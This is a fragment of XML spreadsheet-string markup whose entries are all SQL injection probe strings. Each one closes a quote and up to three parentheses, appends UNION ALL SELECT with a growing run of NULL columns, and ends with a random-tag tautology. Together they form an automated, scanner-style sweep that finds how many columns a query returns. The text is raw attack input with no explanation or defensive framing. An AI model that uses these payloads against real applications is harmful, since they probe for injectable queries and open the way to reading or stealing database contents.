    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'tqlx' = 'tqlx</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</si>
  <si>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'Gavy' = 'Gavy</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</si>
  <si>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'mAsH' = 'mAsH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'BHYp' = 'BHYp</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'PyVA' = 'PyVA</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'XivY' = 'XivY</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'KHVH' = 'KHVH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'AeEt' = 'AeEt</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'WGuH' = 'WGuH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Ikwy' = 'Ikwy</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'GPeq' = 'GPeq</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'HmPk' = 'HmPk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</si>
  <si>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'HRdC' = 'HRdC</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'VOEo' LIKE 'VOEo</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'knfk' LIKE 'knfk</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'cvcv' LIKE 'cvcv</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'kyVg' LIKE 'kyVg</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'irmA' LIKE 'irmA</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'yeXF' LIKE 'yeXF</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'hIWr' LIKE 'hIWr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'jfbP' LIKE 'jfbP</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ZymQ' LIKE 'ZymQ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</si>
  <si>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'mdAK' LIKE 'mdAK</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'fHSu' LIKE 'fHSu</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'sepB' LIKE 'sepB</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'AFyh' LIKE 'AFyh</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'YqyT' LIKE 'YqyT</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'QEFW' LIKE 'QEFW</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'pFZW' LIKE 'pFZW</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'RAEm' LIKE 'RAEm</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'JDFW' LIKE 'JDFW</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</si>
  <si>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'zcTu' LIKE 'zcTu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</si>
  <si>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'AyLC' LIKE 'AyLC</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'aBEH' LIKE 'aBEH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'zlvD' LIKE 'zlvD</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'THGX' LIKE 'THGX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'vHmD' LIKE 'vHmD</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'asds' LIKE 'asds</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'naFh' LIKE 'naFh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'paYz' LIKE 'paYz</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'QcyB' LIKE 'QcyB</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</si>
  <si>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'TyXh' LIKE 'TyXh</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</si>
  <si>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'Pzza' LIKE 'Pzza</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'lbgE' LIKE 'lbgE</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'vIhQ' LIKE 'vIhQ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'hezx' LIKE 'hezx</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'qVNj' LIKE 'qVNj</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Zxus' LIKE 'Zxus</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xMJk' LIKE 'xMJk</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'VEju' LIKE 'VEju</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'mOaT' LIKE 'mOaT</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'iCsk' LIKE 'iCsk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</si>
  <si>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'RVjq' LIKE 'RVjq</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "EdMS" = "EdMS</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "qpuA" = "qpuA</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "FVFk" = "FVFk</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "pndi" = "pndi</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "ttDh" = "ttDh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "PpsQ" = "PpsQ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "TpEx" = "TpEx</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "pgzX" = "pgzX</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "NxYf" = "NxYf</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</si>
  <si>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"unds" = "unds</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "CzOM" = "CzOM</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "tAfA" = "tAfA</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "IUBo" = "IUBo</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "AwuX" = "AwuX</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "isdB" = "isdB</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "SnfO" = "SnfO</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "otPr" = "otPr</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "bzUo" = "bzUo</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</si>
  <si>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"MBCu" = "MBCu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</si>
  <si>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"eQtI" = "eQtI</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "UaUT" = "UaUT</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "nrNC" = "nrNC</t>
  </si>
  <si>
